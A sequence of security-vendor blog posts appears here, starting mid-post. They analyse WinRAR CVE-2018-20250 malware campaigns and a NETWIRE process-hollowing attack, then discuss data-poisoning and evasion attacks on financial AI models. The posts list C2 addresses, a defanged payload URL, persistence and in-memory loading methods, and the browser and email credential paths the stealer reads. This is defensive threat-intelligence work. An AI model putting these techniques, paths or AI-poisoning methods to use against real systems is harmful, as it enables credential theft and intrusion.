LightGBM with altered sample weights

1100

Table 1: A description of the models tested

The baseline model has 100 fewer trees than the other models, which could explain the comparatively reduced accuracy. However, we tried increasing the number of trees which resulted in only a minor increase in accuracy of < 0.001%. The increase in accuracy for the non-baseline methods is due to the differences in data set and training methods. Both incremental training and RCOP work as expected producing less churn than the standard retrain, while showing accuracy improvements over the baseline. In general, there is usually a trend of increasing accuracy being correlated with increasing bad churn: there is no free lunch. That increasing accuracy occurs due to changes in the decision boundary, the more improvement the more changes occur. It seems reasonable the increasing decision boundary changes correlate with an increase in bad churn although we see no theoretical justification for why that must always be the case.

Unexpectedly, both the incremental model and RCOP produce more accurate models with less churn than the standard retrain. We would have assumed that given their additional constraints both models would have less accuracy with less churn. The most direct comparison is RCOP versus the standard retrain. Both models use identical data sets and model parameters, varying only by the weights associated with each sample. RCOP reduces the weight of incorrectly classified samples by the baseline model. That reduction is responsible for the improvement in accuracy. A possible explanation of this behavior is mislabeled training data. Multiple authors have suggested identifying and removing points with label noise, often using the misclassifications of a previously trained model to identify those noisy points. Our scheme, which reduces the weight of those points instead of removing them, is not dissimilar to those other noise reduction approaches which could explain the accuracy improvement.

Conclusion

ML models experience an inherent struggle: not retraining means being vulnerable to new classes of threats, while retraining causes churn and potentially reintroduces old vulnerabilities. In this blog post, we have discussed two different approaches to modifying ML model training in order to reduce churn: incremental model training and churn-aware learning. Both demonstrate effectiveness in the EMBER malware classification data set by reducing the bad churn, while simultaneously improving accuracy. Finally, we also demonstrated the novel conclusion that reducing churn in a data set with label noise can result in a more accurate model. Overall, these approaches provide low technical debt solutions to updating models that allow data scientists and machine learning engineers to keep their models up-to-date against the latest cyber threats at minimal cost. At FireEye, our data scientists work closely with the FireEye Labs detection analysts to quickly identify misclassifications and use these techniques to reduce the impact of churn on our customers.

WinRAR Zero-day Abused in Multiple Campaigns

26 March 2019 at 15:30

WinRAR, an over 20-year-old file archival utility used by over 500 million users worldwide, recently acknowledged a long-standing vulnerability in its code-base. A recently published path traversal zero-day vulnerability, disclosed in CVE-2018-20250 by Check Point Research, enables attackers to specify arbitrary destinations during file extraction of ‘ACE’ formatted files, regardless of user input. Attackers can easily achieve persistence and code execution by creating malicious archives that extract files to sensitive locations, like the Windows “Startup” Start Menu folder. While this vulnerability has been fixed in the latest version of WinRAR (5.70), WinRAR itself does not contain auto-update features, increasing the likelihood that many existing users remain running out-of-date versions. 

FireEye has observed multiple campaigns leveraging this vulnerability, in addition to those already discussed by 360 Threat Intelligence Center. Below we will look into some campaigns we came across that used customized and interesting decoy documents with a variety of payloads including ones which we have not seen before and the ones that used off-the-shelf tools like PowerShell Empire.

Campaign 1: Impersonating an Educational Accreditation Council

Infection Vector

When the ACE file Scan_Letter_of_Approval.rar is extracted with vulnerable WinRAR versions lower than 5.70, it creates a file named winSrvHost.vbs in the Windows Startup folder without the user’s consent. The VBScript file is executed the next time Windows starts up.

Decoy Document

To avoid user suspicion, the ACE file contains a decoy document, “Letter of Approval.pdf”, which purports to be from CSWE, the Council on Social Work Education as shown in Figure 1. This seems to be copied from CSWE website.


Figure 1: Decoy document impersonating CSWE

VBS Backdoor

The VBS file in the Startup folder will be executed by wscript.exe when Windows starts up. The VBS code first derives an ID for the victim using custom logic based on a combination of the ComputerName, Processor_identifier and Username. It obtains these from environment strings, as shown in Figure 2.


Figure 2: Deriving victim ID

Interestingly, the backdoor communicates with the command and control (C2) server using the value of the Authorization HTTP header using the code in Figure 3.


Figure 3: Base64-encoded data in Authorization header

The VBS backdoor first sends the base64-encoded data, including the victim ID and the ComputerName, using the code in Figure 4.


Figure 4: Base64-encoded victim data

It then extracts the base64-encoded data in the Authorization header of the HTTP response from the C2 server and decodes it. The decoded data starts with the instruction code from the C2 server, followed with additional parameters.

C2 Communication

The malware reaches out to the C2 server at 185[.]162.131.92 via an HTTP request. Actual communication is via the Authorization field, as shown in Figure 5.


Figure 5: Communication via Authorization field

Upon decoding the value of the Authorization field, it can be seen that the malware is sending the Victim ID and the computer name to the C2 server. The C2 server responds with the commands in the value of the Authorization HTTP header, as shown in Figure 6.


Figure 6: C2 commands in Authorization field

Upon decoding, the commands are found to be “ok ok”, which we believe is the default C2 command. After some C2 communication, the C2 server responded with instructions to download the payload from hxxp://185.49.71[.]101/i/pwi_crs.exe, which is a Netwire RAT.

Commands Supported by VBS Backdoor

Command

Explanation

d

Delete the VBS file and exit process

Pr

Download a file from a URL and execute it

Hw

Get hardware info

av

Look for antivirus installed from a predefined list.

Indicators

File Name

Hash/IP Address

Scan_Letter_of_Approval.rar

8e067e4cda99299b0bf2481cc1fd8e12

winSrvHost.vbs

3aabc9767d02c75ef44df6305bc6a41f

Letter of Approval.pdf

dc63d5affde0db95128dac52f9d19578

pwi_crs.exe

12def981952667740eb06ee91168e643

C2

185[.]162.131.92

Netwire C2

89[.]34.111.113

Campaign 2: Attack on Israeli Military Industry

Infection Vector

Based on the email uploaded to VirusTotal, the attacker seems to send a spoofed email to the victim with an ACE file named SysAid-Documentation.rar as an attachment. Based on the VirusTotal uploader and the email headers, we believe this is an attack on an Israeli military company.

Decoy Files

The ACE file contains decoy files related to documentation for SysAid, a help desk service based in Israel. These files are shown as they would be displayed in WinRAR in Figure 7.


Figure 7: Decoy files

Thumbs.db.lnk

This LNK file target is ‘C:\Users\john\Desktop\100m.bat’. But when we look at the icon location using a LNK parser, as shown in Figure 8, it points to an icon remotely hosted on one of the C2 servers, which can be used to steal NTLM hashes.


Figure 8: LNK parser output

SappyCache Analysis

Upon extraction, WinRAR copies a previously unknown payload we call SappyCache to the Startup folder with the file name ‘ekrnview.exe’. The payload is executed the next time Windows starts up.

SappyCache tries to fetch the next-stage payload using three approaches:

1) Decrypting a File: The malware tries to read the file at %temp%\..\GuiCache.db. If it is successful, it tries to decrypt it using RC4 to get the C2 URLs, as shown in Figure 9.


Figure 9: Decrypting file at GuiCache.db

2) Decrypting a Resource: If it is not successful in retrieving the C2 URL using the previous method, the malware tries to retrieve the encrypted C2 URLs from a resource section, as shown in Figure 10. If it is successful, it will decrypt the C2 URLs using RC4.


Figure 10: Decrypting a resource

3) Retrieving From C2: If it is not successful in retrieving the C2 URLs using those previous two methods, the malware tries to retrieve the payload from four different hardcoded URLs mentioned in the indicators. The malware creates the HTTP request using the following information:

  • Computer Name, retrieved using the GetComputerNameA function, as the HTTP parameter ‘name’ (Figure 11).


Figure 11: Retrieving computer name using GetComputerNameA

  • Windows operating system name, retrieved by querying the ProductName value from the registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion, as the HTTP parameter ‘key’ (Figure 12).


Figure 12: Retrieving Windows OS name using ProductName value

  • The module name of the malware, retrieved using the GetModuleFileNameA function, as the HTTP parameter ‘page’ (Figure 13).


Figure 13: Retrieving malware module name using using GetModuleFileNameA

  • The list of processes and their module names, retrieved using the Process32First and Module32First APIs, as the HTTP parameter ‘session_data’ (Figure 14).


Figure 14: Retrieving processes and modules using Process32First and Module32First

A fragment of the HTTP request that is built with the information gathered is shown in Figure 15.


Figure 15: HTTP request fragment

If any of the aforementioned methods is successful, the malware tries to execute the decrypted payload. During our analysis, the C2 server did not respond with a next-level payload.

Indicators

File Name/Type

Hash/URL

SysAid-Documentation.rar

062801f6fdbda4dd67b77834c62e82a4 

SysAid-Documentation.rar

49419d84076b13e96540fdd911f1c2f0

ekrnview.exe

96986B18A8470F4020EA78DF0B3DB7D4

Thumbs.db.lnk

31718d7b9b3261688688bdc4e026db99

URL1

www.alahbabgroup[.]com/bakala/verify.php

URL2

103.225.168[.]159/admin/verify.php

URL3

www.khuyay[.]org/odin_backup/public/loggoff.php

URL4

47.91.56[.]21/verify.php

Email

8c93e024fc194f520e4e72e761c0942d

Campaign 3: Potential Attack in Ukraine with Empire Backdoor

Infection Vector

The ACE file named zakon.rar is propagated using a malicious URL mentioned in the indicators. 360 Threat Intelligence Center has also encountered this campaign.

Decoy Documents

The ACE file contains a file named Ukraine.pdf, which contains a message on the law of Ukraine about public-private partnerships that purports to be a message from Viktor Yanukovych, former president of Ukraine (Figure 16 and Figure 17).


Figure 16: Ukraine.pdf decoy file


Figure 17: Contents of decoy file

Based on the decoy PDF name, the decoy PDF content and the VirusTotal uploader, we believe this is an attack on an individual in Ukraine.

Empire Backdoor

When the file contents are extracted, WinRAR drops a .bat file named mssconf.bat in the Startup folder. The batch file contains commands that invoke base64-encoded PowerShell commands. After decoding, the PowerShell commands invoked are found to be the Empire backdoor, as shown in Figure 18. We did not observe any additional payloads at the time of analysis.


Figure 18: Empire backdoor

Indicators

File Name/URL

Hash/URL

zakon.rar

9b19753369b6ed1187159b95fc8a81cd

mssconf.bat

79B53B4555C1FB39BA3C7B8CE9A4287E

C2

31.148.220[.]53

URL

http://tiny-share[.]com/direct/7dae2d144dae4447a152bef586520ef8

Campaign 4: Credential and Credit Card Dumps as Decoys

Decoy Documents

This campaign uses credential dumps and likely stolen credit card dumps as decoy documents to distribute different types of RATs and password stealers.

One file, ‘leaks copy.rar’, used text files that contained stolen email IDs and passwords as decoys. These files are shown as they would be displayed in WinRAR in Figure 19.


Figure 19: Text files containing stolen email credentials as decoy

Another file, ‘cc.rar’, used a text file containing stolen credit card details as a decoy. The file as it would be displayed in WinRAR and sample contents of the decoy file are shown in Figure 20.


Figure 20: Text file containing stolen credit card details as decoy

Payloads

This campaign used payloads from different malware families. To keep the draft concise, we did not include the analysis of all of them. The decompilation of one of the payloads with hash 1BA398B0A14328B9604EEB5EBF139B40 shows keylogging capabilities (Figure 21). We later identified this sample as QuasarRAT.


Figure 21: Keylogging capabilities

The decompilation of all the .NET-based payload shows that much of the code is written in Chinese. The decompilation of malware with hash BCC49643833A4D8545ED4145FB6FDFD2 containing Chinese text is shown in Figure 22. We later identified this sample as Buzy.


Figure 22: Code written in Chinese

The other payloads also have similar keylogging, password stealing and standard RAT capabilities. The VirusTotal submissions show the use of different malware families in this campaign and a wide range of targeting.

Hashes of ACE Files

File Name

Hash

leaks copy.rar

e9815dfb90776ab449539a2be7c16de5

cc.rar

9b81b3174c9b699f594d725cf89ffaa4

zabugor.rar

914ac7ecf2557d5836f26a151c1b9b62

zabugorV.rar

eca09fe8dcbc9d1c097277f2b3ef1081 

Combolist.rar

1f5fa51ac9517d70f136e187d45f69de

Nulled2019.rar

f36404fb24a640b40e2d43c72c18e66b

IT.rar

0f56b04a4e9a0df94c7f89c1bccf830c

Hashes of Payloads

File name

Hash

Malware Family

explorer.exe

1BA398B0A14328B9604EEB5EBF139B40

QuasarRAT

explorer.exe

AAC00312A961E81C4AF4664C49B4A2B2

Azorult

IntelAudio.exe

2961C52F04B7FDF7CCF6C01AC259D767

Netwire

Discord.exe

97D74671D0489071BAA21F38F456EB74

Razy

Discord.exe

BCC49643833A4D8545ED4145FB6FDFD2

Buzy

old.exe

119A0FD733BC1A013B0D4399112B8626

Azorult

FireEye Detection

FireEye detection names for the indicators in the attack:

FireEye Endpoint Security

IOC: WINRAR (EXPLOIT)

MG: Generic.mg

AV: 

  • Exploit.ACE-PathTraversal.Gen
  • Exploit.Agent.UZ
  • Exploit.Agent.VA
  • Gen:Heur.BZC.ONG.Boxter.91.1305E319
  • Gen:Variant.Buzy.2604
  • Gen:Variant.Razy.472302
  • Generic.MSIL.PasswordStealerA.5CBD94BB
  • Trojan.Agent.DPAS
  • Trojan.GenericKD.31783690
  • Trojan.GenericKD.31804183

FireEye Network Security

  • FE_Exploit_ACE_CVE201820250_2
  • FE_Exploit_ACE_CVE201820250_1
  • Backdoor.EMPIRE
  • Downloader.EMPIRE
  • Trojan.Win.Azorult
  • Trojan.Netwire

FireEye Email Security

  • FE_Exploit_ACE_CVE201820250_2
  • FE_Exploit_ACE_CVE201820250_1
  • FE_Backdoor_QUASARRAT_A
  • FE_Backdoor_EMPIRE

Conclusion

We have seen how various threat actors are abusing the recently disclosed WinRAR vulnerability using customized decoys and payloads, and by using different propagation techniques such as email and URL. Because of the huge WinRAR customer-base, lack of auto-update feature and the ease of exploitation of this vulnerability, we believe this will be used by more threat actors in the upcoming days.

Traditional AV solutions will have a hard time providing proactive zero-day detection for unknown malware families. FireEye MalwareGuard, a component of FireEye Endpoint Security, detects and blocks all the PE executables mentioned in this blog post using machine learning. It’s also worth noting that this vulnerability allows the malicious ACE file to write a payload to any path if WinRAR has sufficient permissions, so although the exploits that we have seen so far chose to write the payload to startup folder, a more involved threat actor can come up with a different file path to achieve code execution so that any behavior based rules looking for WinRAR writing to the startup folder can be bypassed. Enterprises should consider blocking vulnerable WinRAR versions and mandate updating WinRAR to the latest version.

FireEye Endpoint Security, FireEye Network Security and FireEye Email Security detect and block these campaigns at several stages of the attack chain.

Acknowledgement

Special thanks to Jacob Thompson, Jonathan Leathery and John Miller for their valuable feedback on this blog post.

Dissecting a NETWIRE Phishing Campaign's Usage of Process Hollowing

15 March 2019 at 16:00

Introduction

Malware authors attempt to evade detection by executing their payload without having to write the executable file on the disk. One of the most commonly seen techniques of this "fileless" execution is code injection. Rather than executing the malware directly, attackers inject the malware code into the memory of another process that is already running.

Due to its presence on all Windows 7 and later machines and the sheer number of supported features, PowerShell has been a favorite tool of attackers for some time. FireEye has published multiple reports where PowerShell was used during initial malware delivery or during post-exploitation activities. Attackers have abused PowerShell to easily interact with other Windows components to perform their activities with stealth and speed.

This blog post explores a recent phishing campaign observed in February 2019, where an attacker targeted multiple customers and successfully executed their payload without having to write the executable dropper or the payload to the disk. The campaign involved the use of VBScript, PowerShell and the .NET framework to perform a code injection attack using a process hollowing technique. The attacker abused the functionality of loading .NET assembly directly into memory of PowerShell to execute malicious code without creating any PE files on the disk.

Activity Summary

The user is prompted to open a document stored on Google Drive. The name of the file, shown in Figure 1, suggests that the actor was targeting members of the airline industry that use a particular aircraft model. We have observed an increasing number of attackers relying on cloud-based file storage services that bypass firewall restrictions to host their payload.


Figure 1: Malicious script hosted on Google Drive

As seen in Figure 2, attempting to open the script raises an alert from Internet Explorer saying that the publisher could not be verified. In our experience, many users will choose to ignore the warning and open the document.


Figure 2: Alert raised by Internet Explorer

Upon execution, after multiple levels of obfuscation, a PowerShell script is executed that loads a .NET assembly from a remote URL, functions of which are then used to inject the final payload (NETWIRE Trojan) into a benign Microsoft executable using process hollowing. This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables.

Technical Details

The initial document contains VBScript code. When the user opens it, Wscript is spawned by iexplore to execute this file. The script uses multiple layers of obfuscation to bypass static scanners, and ultimately runs a PowerShell script for executing the binary payload.

Obfuscation techniques used during different levels of script execution are shown in Figure 3 and Figure 4.


Figure 3: Type 1 obfuscation technique, which uses log functions to resolve a wide character


Figure 4: Type 2 obfuscation technique, which uses split and replace operations

This script then downloads and executes another encoded .vbs script from a paste.ee URL, as seen in Figure 5. Paste.ee is a less regulated alternative to Pastebin and we have seen multiple attacks using this service to host the payload. Since the website uses TLS, most firewall solutions cannot detect the malicious content being downloaded over the network.


Figure 5: Downloading the second-stage script and creating a scheduled task

The script achieves persistence by copying itself to Appdata/Roaming and using schtasks.exe to create a scheduled task that runs the VBScript every 15 minutes.

After further de-obfuscation of the downloaded second-stage VBScript, we obtain the PowerShell script that is executed through a shell object, as shown in Figure 6.


Figure 6: De-obfuscated PowerShell script

The PowerShell script downloads two Base64-encoded payloads from paste.ee that contain binary executable files. The strings are stored as PowerShell script variables and no files are created on disk.  

Microsoft has provided multiple ways of interacting with the .NET framework in PowerShell to enhance it through custom-developed features. These .NET integrations with PowerShell are particularly attractive to attackers due to the limited visibility that traditional security monitoring tools have around the runtime behaviors of .NET processes. For this reason, exploit frameworks such as CobaltStrike and Metasploit have options to generate their implants in .NET assembly code.

Here, the attackers have used the Load method from the System.Reflection.Assembly .NET Framework class. After the assembly is loaded as an instance of System.Reflection.Assembly, the members can be accessed through that object similarly to C#, as shown in Figure 7.


Figure 7: Formatted PowerShell code

The code identifies the installed version of .NET and uses it later to dynamically resolve the path to the .NET installation folder. The decoded dropper assembly is passed as an argument to the Load method. The resulting class instance is stored as a variable.

The objects of the dropper are accessed through this variable and method R is invoked. Method R of the .NET dropper is responsible for executing the final payload.

The following are the parameters for method R:

  • Path to InstallUtil.exe (or other .NET framework tools)
  • Decoded NETWIRE trojan

When we observed the list of processes spawned during the attack (Figure 8), we did not see the payload spawned as a separate process.  


Figure 8: Processes spawned during attack

We observed that the InstallUtil.exe process was being created in suspended mode. Once it started execution, we compared its memory artifacts to a benign execution of InstallUtil.exe and concluded that the malicious payload is being injected into the memory of the newly spawned InstallUtil.exe process. We also observed that no arguments are passed to InstallUtil, which would cause an error under normal execution since InstallUtil always expects at least one argument.

From a detection evasion perspective, the attacker has chosen an interesting approach. Even if the PowerShell process creation is detected, InstallUtil.exe is executed from its original path. Furthermore, InstallUtil.exe is a benign file often used by internal automations. To an unsuspecting system administrator, this might not seem malicious.

When we disassembled the .NET code and removed the obfuscation to understand how code injection was performed, we were able to identify Windows win32 API calls associated with process hollowing (Figure 9).


Figure 9: Windows APIs used in .NET dropper for process hollowing

After reversing and modifying the code of the C# dropper to invoke R from main, we were able to confirm that when the method R is invoked, InstallUtil.exe is spawned in suspended mode. The memory blocks of the suspended process are unmapped and rewritten with the sections of the payload program passed as an argument to method R. The thread is allowed to continue after changes have been made to the entry point. When the process hollowing is complete, the parent PowerShell process is terminated.

High-Level Analysis of the Payload

The final payload was identified by FireEye Intelligence as a NETWIRE backdoor. The backdoor receives commands from a command and control (C2) server, performs reconnaissance that includes the collection of user data, and returns the information to the C2 server.

Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory.

The malware also contains a custom obfuscation algorithm to hide registry keys, APIs, DLL names, and other strings from static analysis. Figure 10 provides the decompiled version of the custom decoding algorithm used on these strings.


Figure 10: Decompiled string decoding algorithm

From reversing and analyzing the behavior of the malware, we were able to identify the following capabilities:

  • Record mouse and keyboard events
  • Capture session logon details
  • Capture system details
  • Take screenshots
  • Monitor CPU usage
  • Create fake HTTP proxy

From the list of decoded strings, we were able to identify other features of this sample:

“POP3”

“IMAP”

“SMTP”

“HTTP”

"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\”

"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\”

"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\”

 

Stealing data from an email client

 

 

“\Google\Chrome\User Data\Default\Login Data”

“\Chromium\User Data\Default\Login Data”

“\Comodo\Dragon\User Data\Default\Login Data”

“\Yandex\YandexBrowser\User Data\Default\Login Data”

“\Opera Software\Opera Stable\Login Data”

“Software\Microsoft\Internet Explorer\IntelliForms\Storage2”

“vaultcli.dll: VaultOpenVault,VaultCloseVault,VaultEnumerateItem,VaultGetItem,VaultFree”

“select *  from moz_login”

 

Stealing login details from browsers

 

A complete report on the NETWIRE backdoor family is available to customers who subscribe to the FireEye Intelligence portal.

Indicators of Compromise

Host-based indicators:

dac4ed7c1c56de7d74eb238c566637aa

Initial attack vector .vbs file

Network-based indicators:

178.239.21.]62:1919

kingshakes[.]linkpc[.]net

 

105.112.35[.]72:3575

homi[.]myddns[.]rocks

C2 domains of NETWIRE Trojan

FireEye Detection

FireEye detection names for the indicators in the attack:

Endpoint security

  • Exploit Guard: Blocks execution of wscript
  • IOC: POWERSHELL DOWNLOADER D (METHODOLOGY)
  • AV: Trojan.Agent.DRAI

Network Security

  • Backdoor.Androm

Email Security

  • Malicious.URL
  • Malware.Binary.vbs

Conclusion

Malware authors continue to use different "fileless" process execution techniques to reduce the number of indicators on an endpoint. The lack of visibility into .NET process execution combined with the flexibility of PowerShell makes this technique all the more effective.

FireEye Endpoint Security and the FireEye Network Security detect and block this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Frederick House, Arvind Gowda, Nart Villeneuve and Nick Carr for their valuable feedback.

Breaking the Bank: Weakness in Financial AI Applications

13 March 2019 at 16:00

Currently, threat actors possess limited access to the technology required to conduct disruptive operations against financial artificial intelligence (AI) systems and the risk of this targeting type remains low. However, there is a high risk of threat actors leveraging AI as part of disinformation campaigns to cause financial panic. As AI financial tools become more commonplace, adversarial methods to exploit these tools will also become more available, and operations targeting the financial industry will be increasingly likely in the future.

AI Compounds Both Efficiency and Risk

Financial entities increasingly rely on AI-enabled applications to streamline daily operations, assess client risk, and detect insider trading. However, researchers have demonstrated how exploiting vulnerabilities in certain AI models can adversely affect the final performance of a system. Cyber threat actors can potentially leverage these weaknesses for financial disruption or economic gain in the future.

Recent advances in adversarial AI research highlights the vulnerabilities in some AI techniques used by the financial sector. Data poisoning attacks, or manipulating a model's training data, can affect the end performance of a system by leading the model to generate inaccurate outputs or assessments. Manipulating the data used to train a model can be particularly powerful if it remains undetected, since "finished" models are often trusted implicitly. It should be noted that adversarial AI research demonstrates how anomalies in a model do not necessarily point users toward a wrong answer, but redirect users away from the more correct output. Additionally some cases of compromise require threat actors to obtain a copy of the model itself, through reverse engineering or compromising the machine learning pipeline of the target. The following are some vulnerabilities that assume this white-box knowledge of the models under attack:

  • Classifiers are used for detection and identification, such as object recognition in driverless cars and malware detection in networks. Researchers have demonstrated how these classifiers can be susceptible to evasion, meaning objects can be misclassified due to inherent weaknesses in the mode (Figure 1).


Figure 1: Examples of classifier evasion where AI models identified 6 as 2

  • Researchers have highlighted how data poisoning can influence the outputs of AI recommendation systems. By changing reward pathways, adversaries can make a model suggest a suboptimal output such as reckless trades resulting in substantial financial losses. Additionally, groups have demonstrated a data-poisoning attack where attackers did not have control over how the training data was labeled.
  • Natural language processing applications can analyze text and generate a basic understanding of the opinions expressed, also known as sentiment analysis. Recent papers highlight how users can input corrupt text training examples into sentiment analysis models to degrade the model's overall performance and guide it to misunderstand a body of text.
  • Compromises can also occur when the threat actor has limited access and understanding of the model’s inner-workings. Researchers have demonstrated how open access to the prediction functions of a model as well as knowledge transfer can also facilitate compromise.

How Financial Entities Leverage AI

AI can process large amounts of information very quickly, and financial institutions are adopting AI-enabled tools to make accurate risk assessments and streamline daily operations. As a result, threat actors likely view financial service AI tools as an attractive target to facilitate economic gain or financial instability (Figure 2).


Figure 2: Financial AI tools and their weaknesses

Sentiment Analysis

Use

Branding and reputation are variables that help analysts plan future trade activity and examine potential risks associated with a business. News and online discussions offer a wealth of resources to examine public sentiment. AI techniques, such as natural language processing, can help analysts quickly identify public discussions referencing a business and examine the sentiment of these conversations to inform trades or help assess the risks associated with a firm.

Potential Exploitation

Threat actors can potentially insert fraudulent data that could generate erroneous analyses regarding a publicly traded firm. For example, threat actors could distribute false negative information about a company that could have adverse effects on a business' future trade activity or lead to a damaging risk assessment. Manipulating the data used to train a model can be particularly powerful if it remains undetected, since "finished" models are often trusted implicitly.

Threat Actors Using Disinformation to Cause Financial Panic

FireEye assess with high confidence that there is a high risk of threat actors spreading false information that triggers AI enabled trading and causes financial panic. Additionally, threat actors can leverage AI techniques to generate manipulated multimedia or "deep fakes" to facilitate such disruption.

False information can have considerable market-wide effects. Malicious actors have a history of distributing false information to facilitate financial instability. For example, in April 2013, the Syrian Electronic Army (SEA) compromised the Associated Press (AP) Twitter account and announced that the White House was attacked and President Obama sustained injuries. After the false information was posted, stock prices plummeted.


Figure 3: Tweet from the Syrian Electronic Army (SEA) after compromising Associated Press's Twitter account

  • Malicious actors distributed false messaging that triggered bank runs in Bulgaria and Kazakhstan in 2014. In two separate incidents, criminals sent emails, text messages, and social media posts suggesting bank deposits were not secure, causing customers to withdraw their savings en masse.
  • Threat actors can use AI to create manipulated multimedia videos or "deep fakes" to spread false information about a firm or market-moving event. Threat actors can also use AI applications to replicate the voice of a company's leadership to conduct fraudulent trades for financial gain.
  • We have observed one example where a manipulated video likely impacted the outcome of a political campaign.
Portfolio Management

Use

Several financial institutions are employing AI applications to select stocks for investment funds, or in the case of AI-based hedge funds, automatically conduct trades to maximize profits. Financial institutions can also leverage AI applications to help customize a client's trade portfolio. AI applications can analyze a client's previous trade activity and propose future trades analogous to those already found in a client's portfolio.

Potential Exploitation

Actors could influence recommendation systems to redirect a hedge fund toward irreversible bad trades, causing the company to lose money (e.g., flooding the market with trades that can confuse the recommendation system and cause the system to start trading in a way that damages the company).

Moreover, many of the automated trading tools used by hedge funds operate without human supervision and conduct trade activity that directly affects the market. This lack of oversight could leave future automated applications more vulnerable to exploitation as there is no human in the loop to detect anomalous threat activity.

Threat Actors Conducting Suboptimal Trades

We assess with moderate confidence that manipulating trade recommendation systems poses a moderate risk to AI-based portfolio managers.

  • The diminished human involvement with trade recommendation systems coupled with the irreversibility of trade activity suggest that adverse recommendations could quickly escalate to a large-scale impact.
  • Additionally, operators can influence recommendation systems without access to sophisticated AI technologies; instead, using knowledge of the market and mass trades to degrade the application's performance.
  • We have previously observed malicious actors targeting trading platforms and exchanges, as well as compromising bank networks to conduct manipulated trades.
  • Both state-sponsored and financially motivated actors have incentives to exploit automated trading tools to generate profit, destabilize markets, or weaken foreign currencies.
  • Russian hackers reportedly leveraged Corkow malware to place $500M worth of trades at non-market rates, briefly destabilizing the dollar-ruble exchange rate in February 2015. Future criminal operations can leverage vulnerabilities in automatic training algorithms to disrupt the market with a flood of automated bad trades.
Compliance and Fraud Detection

Use

Financial institutions and regulators are leveraging AI-enabled anomaly detection tools to ensure that traders are not engaging in illegal activity. These tools can examine trade activity, internal communications, and other employee data to ensure that workers are not capitalizing on advanced knowledge of the market to engage in fraud, theft, insider trading, or embezzlement.

Potential Exploitation

Sophisticated threat actors can exploit the weaknesses in classifiers to alter an AI-based detection tool and mischaracterize anomalous illegal activity as normal activity. Manipulating the model helps insider threats conduct criminal activity without fear of discovery.

Threat Actors Camouflaging Insider Threat Activity

Currently threat actors possess limited access to the kind of technology required to evade these fraud detection systems, and therefore with high confidence we assess that the threat of this activity type remains low. However, as AI financial tools become more commonplace, adversarial methods to exploit these tools will also become more available and insider threats leveraging AI to evade detection will likely increase in the future.

Underground forums and social media posts demonstrate there is a market for individuals with insider access to financial institutions. Insider threats could exploit weaknesses in AI-based anomaly detectors to camouflage nefarious activity, such as external communications, erratic trades, and data transfers, as normal activity.

Trade Simulation

Use

Financial entities can use AI tools that leverage historical data from previous trade activity to simulate trades and examine their effects. Quant-fund managers and high-speed traders can use this capability to strategically plan future activity, such as the optimal time of the day to trade. Additionally, financial insurance underwriters can use these tools to observe the impact of market-moving activity and generate better risk assessments.

Potential Exploitation

By exploiting inherent weaknesses in an AI model, threat actors could lull a company into a false sense of security regarding the way a trade will play out. Specifically, threat actors could find out when a company is training their model and inject corrupt data into a dataset being used to train the model. Subsequently, the end application generates an incorrect simulation of potential trades and their consequences. These models are regularly trained on the latest financial information to improve a simulation's performance, providing threat actors with multiple opportunities for data poisoning attacks. Additionally, some high-speed traders speculate that threats could flood the market with fake sell orders to confuse trading algorithms and potentially cause the market to crash.

FireEye Threat Intelligence has previously examined how financially motivated actors can leverage data manipulation for profit through pump and dump scams and stock manipulation.

Threat Actors Conducting Insider Trading

FireEye assesses with moderate confidence that the current risk of threat actors leveraging these attacks is low as exploitations of trade simulations require sophisticated technology as well as additional insider intelligence regarding when a financial company is training their model. Despite these limitations, as financial AI tools become more popular, adversarial methods to exploit these tools are also likely to become more commonplace on underground forums and via state-sponsored threats. Future financially motivated operations could monitor or manipulate trade simulation tools as another means of gaining advanced knowledge of upcoming market activity.

Risk Assessment and Modeling

Use

AI can help the financial insurance sector's underwriting process by examining client data and highlighting features that it considers vulnerable prior to market-moving actions (joint ventures, mergers & acquisitions, research & development breakthroughs, etc.). Creating an accurate insurance policy ahead of market catalysts requires a risk assessment to highlight a client's potential weaknesses.

Financial services can also employ AI applications to improve their risk models. Advances in generative adversarial networks can help risk management by stress-testing a firm's internal risk model to evaluate performance or highlight potential vulnerabilities in a firm's model.

Potential Exploitation

If a country is conducting market-moving events with a foreign business, state-sponsored espionage actors could use data poisoning attacks to cause AI models to over or underestimate the value or risk associated with a firm to gain a competitive advantage ahead of planned trade activity. For example, espionage actors could feasibly use this knowledge and help turn a joint venture into a hostile takeover or eliminate a competitor in a bidding process. Additionally, threat actors can exploit weaknesses in financial AI tools as part of larger third-party compromises against high-value clients.

Threat Actors Influencing Trade Deals and Negotiations

With high confidence, we consider the current threat risk to trade activity and business deals to be low, but as more companies leverage AI applications to help prepare for market-moving catalysts, these applications will likely become an attack surface for future espionage operations.

In the past, state-sponsored actors have employed espionage operations during collaborations with foreign companies to ensure favorable business deals. Future state-sponsored espionage activity could leverage weaknesses in financial modeling tools to help nations gain a competitive advantage.

Outlook and Implications

Businesses adopting AI applications should be aware of the risks and vulnerabilities introduced with these technologies, as well as the potential benefits. It should be noted that AI models are not static; they are routinely updated with new information to make them more accurate. This constant model training frequently leaves them vulnerable to manipulation. Companies should remain vigilant and regularly audit their training data to eliminate poisoned inputs. Additionally, where applicable, AI applications should incorporate human supervision to ensure that erroneous outputs or recommendations do not automatically result in financial disruption.

AI's inherent limitations also pose a problem as the financial sector increasingly adopts these applications for their operations. The lack of transparency in how a model arrived at its answer is problematic for analysts who are using AI recommendations to conduct trades. Without an explanation for its output, it is difficult to determine liability when a trade has negative outcomes. This lack of clarity can lead analysts to mistrust an application and eventually refrain from using it altogether. Additionally, the rise of data privacy laws may also accelerate the need for explainable AI in the financial sector. Europe's General Data Protection Regulation (GDPR) stipulates that companies employing AI applications must have an explanation for decisions made by its models.

Some financial institutions have begun addressing this explainability problem by developing AI models that are inherently more transparent. Researchers have also developed self-explaining neural networks, which provide understandable explanations for the outputs generated by the system.

FLARE Script Series: Recovering Stackstrings Using Emulation with ironstrings

28 February 2019 at 16:30

